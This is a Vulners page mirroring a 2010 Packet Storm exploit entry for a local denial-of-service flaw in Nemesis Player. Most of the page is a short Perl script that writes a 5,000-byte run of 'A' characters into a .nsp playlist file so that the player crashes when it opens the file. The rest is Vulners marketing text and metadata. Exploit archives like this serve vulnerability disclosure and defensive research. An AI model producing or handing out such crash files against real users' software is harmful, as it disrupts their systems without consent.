Lucene search
K

Nemesis Player Denial Of Service

🗓️ 14 Jan 2010 00:00:00Reported by Rehan AhmedType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 20 Views

Nemesis Player Local Denial of Service Vulnerability discovered by Rehan Ahmed on WinXP SP2

Code
`#!/usr/bin/perl  
#Exploit Title: Nemesis Player (NSP) Local Denial of Service (DoS) Vulnerability  
#Date:13/01/2010  
#Author:Vulnerability Discovered By Rehan Ahmed ([email protected])  
#Software Link:http://www.nsplayer.org  
#Version:1.1 Beta/2.2  
#Tested On: WinXP SP2  
  
my $boom="\x41" x 5000;  
my $file="dos.nsp";   
open($FILE,">$file");  
print $FILE $boom;  
close($FILE);  
print "File Successfully Created\n";  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

14 Jan 2010 00:00Current
0.1Low risk
Vulners AI Score0.1
20